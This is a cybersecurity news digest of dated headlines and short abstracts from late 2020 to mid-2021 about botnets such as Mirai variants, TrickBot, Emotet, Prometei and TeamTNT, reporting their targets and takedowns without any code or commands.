Cybersecurity researchers have spotted a new Mirai-inspired botnet, mirai_ptea, abusing an undisclosed vulnerability in KGUARD's Digital Video Recorders (DVR). Mirai’s source code was leaked several years ago, and since then multiple variants are still getting spotted on the threat landscape.Cyware Alerts - Hacker News
July 6, 2021
Trickbot Braces Up For Another Innings Full Text
Abstract
Kryptos Logic Threat Intelligence researchers have revealed a new report about a new TrickBot module that bears precise resemblance to the Zeus attack pattern.Cyware Alerts - Hacker News
July 05, 2021
TrickBot Botnet Found Deploying A New Ransomware Called Diavol Full Text
Abstract
Threat actors behind the infamous TrickBot malware have been linked to a new ransomware strain named "Diavol," according to the latest research. Diavol and Conti ransomware payloads were deployed on different systems in a case of an unsuccessful attack targeting one of its customers earlier this month, researchers from Fortinet's FortiGuard Labs said last week. TrickBot, a banking Trojan first detected in 2016, has traditionally been a Windows-based crimeware solution, employing different modules to perform a wide range of malicious activities on target networks, including credential theft and the conduct of ransomware attacks. Despite efforts by law enforcement to neutralize the bot network, the ever-evolving malware has proven to be a resilient threat, what with the Russia-based operators (dubbed "Wizard Spider") quickly adapting new tools to carry out further attacks. Diavol is said to have been deployed in the wild in one incident to date. The sourcThe Hacker News
July 02, 2021
New Mirai-Inspired Botnet Could Be Using Your KGUARD DVRs in Cyber Attacks Full Text
Abstract
Cybersecurity researchers on Thursday revealed details about a new Mirai-inspired botnet called "mirai_ptea" that leverages an undisclosed vulnerability in digital video recorders (DVR) provided by KGUARD to propagate and carry out distributed denial-of-service (DDoS) attacks. Chinese security firm Netlab 360 pinned the first probe against the flaw on March 23, 2021, before it detected active exploitation attempts by the botnet on June 22, 2021. The Mirai botnet, since emerging on the scene in 2016, has been linked to a string of large-scale DDoS attacks, including one against DNS service provider Dyn in October 2016, causing major internet platforms and services to remain inaccessible to users in Europe and North America. Since then, numerous variants of Mirai have sprung up on the threat landscape, in part due to the availability of its source code on the Internet. Mirai_ptea is no exception. Not much has been disclosed about the security flaw in an attThe Hacker News
July 1, 2021
Alert! Mirai Botnet is Active and So are its Dozen Other Variants Full Text
Abstract
Mirai botnet has been a constant threat since its emergence in 2016. A recent report by McAfee attributed the surge in attacks on IoT (55%) and Linux (38%) systems to Mirai and its variants.Cyware Alerts - Hacker News
July 1, 2021
Mirai_ptea Botnet is Exploiting Undisclosed KGUARD DVR Vulnerability Full Text
Abstract
Researchers from 360 Netlab discovered a variant of the Mirai botnet named mirai_ptea was found exploiting a previously unknown vulnerability in KGUARD DVR for launching DDoS attacks.Netlab
June 22, 2021
DirtyMoe botnet infected 100,000+ Windows systems in H1 2021 Full Text
Abstract
DirtyMoe is a rapidly growing Windows botnet; it grew from 10,000 infected systems in 2020 to more than 100,000 in the first half of 2021. Researchers from Avast are warning of the rapid growth of the DirtyMoe botnet (PurpleFox, Perkiler,...Security Affairs
June 21, 2021
50% of misconfigured containers hit by botnets in under an hour Full Text
Abstract
Aqua Security reported that data it collected from honeypots protecting containers over a six-month period revealed that 50% of misconfigured Docker APIs are attacked by botnets within 56 minutes of being set up.SCMagazine
June 16, 2021
US convicts Russian national behind Kelihos botnet crypting service Full Text
Abstract
Russian national Oleg Koshkin was convicted for charges related to the operation of a malware crypter service used by the Kelihos botnet to obfuscate malware payloads and evade detection.BleepingComputer
June 5, 2021
TeaBot and FluBot - Thugs in Banker’s Disguise Full Text
Abstract
Security researchers have found a new batch of malicious Android applications trying to lure victims by impersonating popular applications. The targeted applications were mostly from renowned financial institutions while spreading TeaBot and FluBot trojans. The use of fake or lookalike malicious a ...Cyware Alerts - Hacker News
June 4, 2021
Necro Python bot now enhanced with new VMWare, server exploits Full Text
Abstract
Operators behind the Necro Python botnet have added new features to their bot, including VMWare and server exploits. Experts from Cisco Talos have recently observed a new Necro Python bot campaign and noticed that its developers have improved its capabilities. The...Security Affairs
May 25, 2021
Phorpiex Botnet is Still Active and Thriving Full Text
Abstract
Decade-old botnets continue to adapt to the current threat landscape, as seen in the case of the wide-ranging malicious activities of the resilient Phorpiex botnet. For many years, though, the Phorpiex botnet has had the same internal infrastructure, C2 mechanisms, and source code.Cyware Alerts - Hacker News
May 21, 2021
Simps Botnet Uses Gafgyt Modules Full Text
Abstract
Researchers uncovered a new botnet malware purposed for DDoS attacks on gaming and other sectors. The malware operators created a Discord server and YouTube channel for its demonstration.Cyware Alerts - Hacker News
May 21, 2021
Ransomware-spreading Phorpiex Botnet Disables Security Solutions to Maintain Persistence Full Text
Abstract
Microsoft notes that from December 2020 to February 2021, the Phorpiex bot loader was encountered in 160 countries, with Mexico, Kazakhstan, and Uzbekistan being the top targeted countries.ZDNet
May 19, 2021
Keksec Cybergang Debuts Simps Botnet for Gaming DDoS Full Text
Abstract
The newly discovered malware infects IoT devices in tandem with the prolific Gafgyt botnet, using known security vulnerabilities.Threatpost
May 18, 2021
Discovery of Simps Botnet Leads To Ties to Keksec Group Full Text
Abstract
Uptycs' threat research team discovered a new botnet, tracked as Simps botnet, attributed to the Keksec group, which is focused on DDoS activities. Uptycs' threat research team has discovered a new Botnet named ‘Simps’ attributed to Keksec group primarily...Security Affairs
May 14, 2021
TeaBot Trojan: Active and Performing Fraudulent Activities Full Text
Abstract
Cybersecurity researchers reported a new Android banking trojan that hijacks user credentials and text messages to distribute fraudulent activities targeting banks in Spain, Germany, the Netherlands, Belgium, and Italy.Cyware Alerts - Hacker News
May 7, 2021
Bot Attacks a Top Cybersecurity Concern Full Text
Abstract
Majority of security leaders view bot mitigation as a top priorityInfosecurity Magazine
May 6, 2021
A taste of the latest release of QakBot Full Text
Abstract
A taste of the latest release of QakBot, one of the most popular and mediatic banking trojans active since 2007. The malware QakBot, also known as Qbot, Pinkslipbot, and Quakbot, is a banking trojan that has been making headlines since 2007. This...Security Affairs
May 5, 2021
New Cryptominer Spotted, Attacks Using Windows and Linux Bots Full Text
Abstract
The Sysrv-hello cryptojacking botnet actively scans for vulnerable Windows and Linux enterprise servers and infects them with a Monero miner, as well as self-propagating malware payloads.Cyware Alerts - Hacker News
May 4, 2021
Massive Botnet Infected Internet TV Users, Now Taken Down Full Text
Abstract
Dubbed Pareto CTV botnet, the botnet was made of almost a million infected Android devices and imitated the activity of millions of people watching ads on their smart devices.Cyware Alerts - Hacker News
May 1, 2021
Gafgyt Learns from Mirai Botnet Full Text
Abstract
The reuse of the Mirai source code has enhanced the capability of Gafgyt to carry out DDoS attacks in various ways.Cyware Alerts - Hacker News
April 26, 2021
When Should U.S. Cyber Command Take Down Criminal Botnets? Full Text
Abstract
The Trickbot takedown and such military operations are a good idea only in cases that meet a five-part test of imminence, severity, overseas focus, nation-state adversary, and military as a last-ish resort.Lawfare
April 26, 2021
Bye Bye Emotet, law enforcement pushed the uninstall code via the botnet Full Text
Abstract
European law enforcement has conducted an operation aimed at performing a mass-sanitization of computers infected with the infamous Emotet Windows malware. European law enforcement agencies automatically wiped the infamous Emotet malware from infected...Security Affairs
April 26, 2021
Prometei botnet is targeting ProxyLogon Microsoft Exchange flaws Full Text
Abstract
Attackers are exploiting the ProxyLogon flaws in Microsoft Exchange to recruit machines in a cryptocurrency botnet tracked as Prometei. Experts from the Cybereason Nocturnus Team have investigated multiple incidents involving the Prometei Botnet....Security Affairs
April 24, 2021
A new Linux Botnet abuses IaC Tools to spread and other emerging techniques Full Text
Abstract
A new Linux botnet uses Tor through a network of proxies using the Socks5 protocol, abuses legitimate DevOps tools, and other emerging techniques. Researchers from Trend Micro have spotted a new Linux botnet employing multiple emerging techniques...Security Affairs
April 23, 2021
New Golang-based Sysrv Cryptomining Botnet Targets Popular Enterprise Applications Full Text
Abstract
As analyzed in reports from security researchers at Alibaba’s Aliyun, Juniper, and Lacework, Sysrv’s internal architecture follows the classic makeup of 99% of most botnets today.The Record
April 23, 2021
Last Chance for Forensics Teams Ahead of Emotet Sunday Deadline Full Text
Abstract
Notorious botnet will be removed from global machines at the weekendInfosecurity Magazine
April 23, 2021
Tor-Based Botnet Malware Targets Linux Systems, Abuses Cloud Management Tools Full Text
Abstract
As Linux attracts more attention from malicious actors, researchers have seen threats evolving — abusing services like Ngrok and using functions to hunt and kill other competing malware.Trend Micro
April 23, 2021
Prometei Botnet Exploiting Unpatched Microsoft Exchange Servers Full Text
Abstract
Attackers are exploiting the ProxyLogon Microsoft Exchange Server flaws to co-opt vulnerable machines to a cryptocurrency botnet named Prometei, according to new research. "Prometei exploits the recently disclosed Microsoft Exchange vulnerabilities associated with the HAFNIUM attacks to penetrate the network for malware deployment, credential harvesting and more," Boston-based cybersecurity firm Cybereason said in an analysis summarizing its findings. First documented by Cisco Talos in July 2020, Prometei is a multi-modular botnet, with the actor behind the operation employing a wide range of specially-crafted tools and known exploits such as EternalBlue and BlueKeep to harvest credentials, laterally propagate across the network and "increase the amount of systems participating in its Monero-mining pool." "Prometei has both Windows-based and Linux-Unix based versions, and it adjusts its payload based on the detected operating system, on the targeted inThe Hacker News
April 22, 2021
Botnet backdoors Microsoft Exchange servers, mines cryptocurrency Full Text
Abstract
Unpatched Microsoft Exchange servers are being targeted by the Prometei botnet and added to its operators' army of Monero (XMR) cryptocurrency mining bots.BleepingComputer
April 22, 2021
Massive Android Botnet Uses Spoofed Apps to Serve Hundreds of Millions of Fraud Ad Requests on Smart TVs Full Text
Abstract
The sophisticated mobile botnet, dubbed Pareto, is made up of nearly a million infected mobile Android devices pretending to be millions of people watching ads on smart TVs and other devices.Security Week
April 22, 2021
Pareto Botnet, million infected Android devices conduct fraud in the CTV ad ecosystem Full Text
Abstract
Researchers from Human Security have uncovered a huge botnet of Android devices being used to conduct fraud in the connected TV advertising ecosystem. Security researchers at Human Security (formerly White Ops) discovered a massive Android botnet,... (Security Affairs)
April 22, 2021
Prometei Botnet Exploits Exchange Server Bugs to Grow Full Text
Abstract
Crypto-mining botnet has been around since 2016. (Infosecurity Magazine)
April 20, 2021
QBot Replaces IcedID in Malspam Campaigns Full Text
Abstract
Cybercriminals were found shuffling payloads once again. Security analysts reported two banking trojans being used alternately to deliver various ransomware strains as the final payload in recent attacks. (Cyware Alerts - Hacker News)
April 19, 2021
Bad bot traffic reaching an all-time high over the past year Full Text
Abstract
There was a 372% increase in bad bot traffic on healthcare websites since September 2020. As vaccines became more widely available, bot activity was recorded at rates of 12,000 requests per hour. (Help Net Security)
April 16, 2021
Mirai code re-use in Gafgyt Full Text
Abstract
Uptycs' threat research team recently detected several variants of the Linux-based botnet malware family “Gafgyt,” some of which re-used Mirai code. Uptycs' threat research team recently detected several variants of the Linux-based botnet malware... (Security Affairs)
March 23, 2021
ZHtrap Botnet: Hackers Pitting Against Each Other Full Text
Abstract
A new IoT botnet has been discovered that deploys honeypots to capture attacks from rival botnets and uses that information to hijack their infrastructure. (Cyware Alerts - Hacker News)
March 19, 2021
CISA and FBI warn of ongoing TrickBot attacks Full Text
Abstract
CISA and FBI are warning of ongoing TrickBot attacks despite security firms having taken down the C2 infrastructure of the infamous botnet in October. The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI)... (Security Affairs)
March 18, 2021
CISA alerts of TrickBot trojan attacks Full Text
Abstract
TrickBot uses person-in-the-browser attacks to steal information, such as login credentials. Some of TrickBot’s modules spread the malware laterally across a network by abusing the SMB protocol. (CISA)
March 18, 2021
Satori: Mirai Botnet Variant Targeting Vantage Velocity Field Unit RCE Vulnerability Full Text
Abstract
Unit 42 researchers observed attempts to exploit CVE-2020-9020, a Remote Command Execution (RCE) vulnerability in Iteris’ Vantage Velocity field unit versions 2.3.1, 2.4.2, and 3.0. (Palo Alto Networks)
March 17, 2021
The Rising, Unpredictable Cases of Botnet Threats Full Text
Abstract
A new variant of the Gafgyt botnet that uses the Tor network to target vulnerable D-Link and IoT devices has been identified by NetLab 360 researchers. (Cyware Alerts - Hacker News)
March 17, 2021
New ZHtrap botnet uses honeypot to find more victims Full Text
Abstract
Netlab 360 experts discovered a new Mirai-based botnet dubbed ZHtrap that implements a honeypot to find more victims. Researchers from Netlab 360 discovered a new Mirai-based botnet dubbed ZHtrap that implements a honeypot to find more victims. ZHtrap... (Security Affairs)
March 17, 2021
Dridex Network Attack Campaign Delivered by Cutwail Botnet and Poisonous PowerShell Scripts Full Text
Abstract
The IBM X-Force threat intelligence team has recently reported that they are continuously witnessing a huge increase in Dridex-related network attacks, and... (Cyber Security News)
March 16, 2021
New botnet targets network security devices with critical exploits Full Text
Abstract
Authors of a new botnet are targeting connected devices affected by critical-level vulnerabilities, some of them impacting network security devices. (BleepingComputer)
March 16, 2021
New Mirai Variant and ZHtrap Botnet Malware Emerge in the Wild Full Text
Abstract
Cybersecurity researchers on Monday disclosed a new wave of ongoing attacks exploiting multiple vulnerabilities to deploy Mirai variants on compromised systems. "Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers," Palo Alto Networks' Unit 42 Threat Intelligence Team said in a write-up. The rash of vulnerabilities being exploited include:
VisualDoor — a SonicWall SSL-VPN remote command injection vulnerability that came to light earlier this January
CVE-2020-25506 - a D-Link DNS-320 firewall remote code execution (RCE) vulnerability
CVE-2021-27561 and CVE-2021-27562 - two vulnerabilities in Yealink Device Management that allow an unauthenticated attacker to run arbitrary commands on the server with root privileges
CVE-2021-22502 - an RCE flaw in Micro Focus Operation Bridge Reporter (OBR), affecting version 10.40
CV (The Hacker News)
March 15, 2021
Trickbot has Filled in Emotet’s Void - Threat Index Report Full Text
Abstract
Check Point lists Trickbot trojan as the most popular malware among cybercriminals in its Global Threat Index report. Here we cover other threats on the list and interesting insights you should know about. (Cyware Alerts - Hacker News)
March 15, 2021
Police shut down Android app that turned smartphones into proxies Full Text
Abstract
According to Spanish and Europol officials, the app enrolled user devices into another company's network, which used the devices as proxy bots in its anonymization offering and for DDoS attacks. (The Record)
March 15, 2021
ZHtrap Botnet Deploys Honeypots to Trap and Takeover Infected Devices From Competing Botnets Full Text
Abstract
Security researchers discovered last week a new IoT botnet that deploys honeypots to capture attacks from rival botnets and then uses that information to hijack its rivals’ infrastructure. (The Record)
March 13, 2021
Cryptomining Botnet Targets Unpatched Vulnerabilities in Cloud Servers Full Text
Abstract
An upgraded version of z0Miner, a cryptomining botnet, has been found attempting to take over Jenkins and ElasticSearch servers to mine for Monero cryptocurrency. (Cyware Alerts - Hacker News)
March 12, 2021
New ZHtrap botnet malware deploys honeypots to find more targets Full Text
Abstract
A new botnet is hunting down unpatched routers, DVRs, and UPnP network devices and transforming the devices it takes over into honeypots that help it find other devices to infect. (BleepingComputer)
March 10, 2021
Cryptomining Botnet z0Miner Targeting ElasticSearch and Jenkins RCE Vulnerabilities Full Text
Abstract
A crypto mining botnet spotted in the previous year is currently targeting and attempting to take control of Jenkins and ElasticSearch servers... (Cyber Security News)
March 09, 2021
z0Miner botnet hunts for unpatched ElasticSearch, Jenkins servers Full Text
Abstract
A cryptomining botnet spotted last year is now targeting and attempting to take control of Jenkins and ElasticSearch servers to mine for Monero (XMR) cryptocurrency. (BleepingComputer)
March 3, 2021
Is Your Browser Extension a Botnet Backdoor? — Krebs on Security Full Text
Abstract
Infatica uses the browser of anyone who has an extension injected with its code to route web traffic for the company’s customers, including marketers or anyone able to afford its subscription charges. (Krebs on Security)
March 2, 2021
Google: Bad bots are on the attack, and your defence plan is probably wrong Full Text
Abstract
According to the advertising giant, 71% of companies experienced an increase in the number of successful bot attacks, and 56% of companies reported seeing different types of attacks. (ZDNet)
February 27, 2021
A Botnet Campaign that Uses Blockchain Transactions to Stay Hidden Full Text
Abstract
Akamai finds a long-running cryptomining botnet campaign wherein hackers exploit BTC blockchain transactions to evade detection by the security systems in place. (Cyware Alerts - Hacker News)
February 26, 2021
Yeezy Fans Face Sneaker-Bot Armies for Boost ‘Sun’ Release Full Text
Abstract
Sneaker bots are ready to scoop up the new Yeezy Boost 700 “Sun” shoes to resell at a huge markup. (Threatpost)
February 24, 2021
A Cryptomining botnet abuses Bitcoin blockchain transactions as C2 backup mechanism Full Text
Abstract
Crooks are exploiting BTC blockchain transactions to hide backup command-and-control (C2) server addresses for a cryptomining botnet. Security experts from Akamai have spotted a new botnet used for illicit cryptocurrency mining activities that is abusing... (Security Affairs)
February 24, 2021
Operators of Cryptomining Botnet Hide Their Backup Communication Behind Bitcoin Blockchain Transactions Full Text
Abstract
The attack chain begins with the exploit of remote code execution (RCE) vulnerabilities impacting software including Hadoop Yarn and Elasticsearch, such as CVE-2015-1427 and CVE-2019-9082. (ZDNet)
February 22, 2021
Watch Out for WatchDog Full Text
Abstract
WatchDog, the cryptomining malware, has been found to be running undetected for more than two years. The botnet has hijacked at least 476 Windows and Linux devices to date. (Cyware Alerts - Hacker News)
February 18, 2021
WatchDog botnet targets Windows and Linux servers in cryptomining campaign Full Text
Abstract
Palo Alto Networks warns of the WatchDog botnet that uses exploits to take over Windows and Linux servers and mine cryptocurrency. Security researchers at Palo Alto Networks uncovered a cryptojacking botnet, tracked as WatchDog, that is targeting Windows... (Security Affairs)
February 08, 2021
Microsoft: Keep your guard up even after Emotet’s disruption Full Text
Abstract
Microsoft warns customers not to let their guard down even after hundreds of Emotet botnet servers were taken down in late January 2021. (BleepingComputer)
January 25, 2021
Cryptomining DreamBus botnet targets Linux servers Full Text
Abstract
Zscaler’s research team recently spotted a Linux-based malware family, tracked as DreamBus botnet, targeting Linux servers. Researchers at Zscaler’s ThreatLabZ research team recently analyzed a Linux-based malware family, tracked as DreamBus Botnet,... (Security Affairs)
January 25, 2021
DreamBus botnet targets enterprise apps running on Linux servers Full Text
Abstract
Analyzed in a report published last week by security firm Zscaler, the company said this new threat is a variant of an older botnet named SystemdMiner, first seen in early 2019. (ZDNet)
January 24, 2021
How to Protect Your IoT Devices From Botnet Attacks Full Text
Abstract
IoT devices allow us to connect everything and make our environment smart. However, the technology has always been marred by insecurity, with... (Cyber Security News)
January 23, 2021
DreamBus Botnet Targets Linux Systems Full Text
Abstract
DreamBus presents a serious threat because of the many components it uses to spread via the internet and the wormlike behavior that enables it to move laterally once inside a targeted system, ThreatLabz says. (Gov Info Security)
January 19, 2021
New FreakOut botnet targets Linux systems running unpatched software Full Text
Abstract
Its current targets include TerraMaster data storage units, web applications built on top of the Zend PHP Framework, and websites running the Liferay Portal content management system. (ZDNet)
January 19, 2021
FreakOut botnet targets 3 recent flaws to compromise Linux devices Full Text
Abstract
Security researchers uncovered a series of attacks conducted by the FreakOut botnet that leveraged recently discovered vulnerabilities. Security researchers from Check Point have uncovered a series of attacks associated with the FreakOut botnet that... (Security Affairs)
January 12, 2021
TeamTNT Botnet Further Evolves with Environment Setup Capabilities Full Text
Abstract
Researchers have linked recent TeamTNT botnet activity to extraction and stealing of Docker and AWS credentials. Previously, it would mine cryptocurrency only on misconfigured container platforms. (Cyware Alerts - Hacker News)
January 10, 2021
TeamTNT botnet now steals Docker API and AWS credentials Full Text
Abstract
Researchers from Trend Micro discovered that the TeamTNT botnet is now able to steal Docker API logins along with AWS credentials. Researchers from Trend Micro discovered that the TeamTNT botnet was improved and is now also able to steal Docker credentials. The... (Security Affairs)
January 9, 2021
A crypto-mining botnet is now stealing Docker and AWS credentials Full Text
Abstract
Researchers have linked the botnet to a cybercrime operation known as TeamTNT, a group first spotted over the summer of 2020 installing cryptocurrency-mining malware on misconfigured container platforms. (ZDNet)
January 7, 2021
The Evolution of Bad Bots from Grinchbots to Parasitic Bots-as-a-Service Full Text
Abstract
The use of scalping bots was once the domain of tickets for sporting events or concerts. But recently, it has become increasingly prevalent in e-commerce and online retail. (Imperva)
December 26, 2020
The Emotet botnet is back and hits 100K recipients per day Full Text
Abstract
Emotet is back on Christmas Eve; cybercrime operators are sending out spam messages to deliver the infamous Trickbot Trojan. Emotet is back on Christmas Eve, after two months of silence, and cybercrime operators are sending out spam messages to deliver... (Security Affairs)
December 25, 2020
Emotet Shows up to Wish Merry Christmas Full Text
Abstract
Emotet botnet has returned after a two-month hiatus with Christmas and COVID-19-themed campaigns that touch base with at least 100,000 targets per day. (Cyware Alerts - Hacker News)
December 23, 2020
Tool shows what bad bot traffic ‘sounds’ like. Is there a practical application? Full Text
Abstract
“Botronica” translates human bot traffic into sounds as a creative way to generate awareness of malicious bot activity. (SCMagazine)
December 19, 2020
Gitpaste-12 worm botnet returns with 30+ vulnerability exploits Full Text
Abstract
The recently discovered Gitpaste-12 worm, which spreads via GitHub and also hosts its malicious payload on Pastebin, has returned with over 30 vulnerability exploits, according to researchers at Juniper Labs. (BleepingComputer)
December 17, 2020
Gitpaste-12 Botnet Evolves to Take More Devices in its Trap Full Text
Abstract
The malware derives its name from GitHub and Pastebin, which are used for propagation, and the 12 different exploits it carries for previously-known vulnerabilities. (Cyware Alerts - Hacker News)
December 15, 2020
Wormable Gitpaste-12 Botnet Returns to Target Linux Servers, IoT Devices Full Text
Abstract
A new wormable botnet that spreads via GitHub and Pastebin to install cryptocurrency miners and backdoors on target systems has returned with expanded capabilities to compromise web applications, IP cameras, and routers. Early last month, researchers from Juniper Threat Labs documented a crypto-mining campaign called "Gitpaste-12," which used GitHub to host malicious code containing as many as 12 known attack modules that are executed via commands downloaded from a Pastebin URL. The attacks occurred during a 12-day period starting from October 15, 2020, before both the Pastebin URL and repository were shut down on October 30, 2020. Now according to Juniper, the second wave of attacks began on November 10 using payloads from a different GitHub repository, which, among others, contains a Linux crypto-miner ("ls"), a file with a list of passwords for brute-force attempts ("pass"), and a local privilege escalation exploit for x86_64 Linux systems. Th (The Hacker News)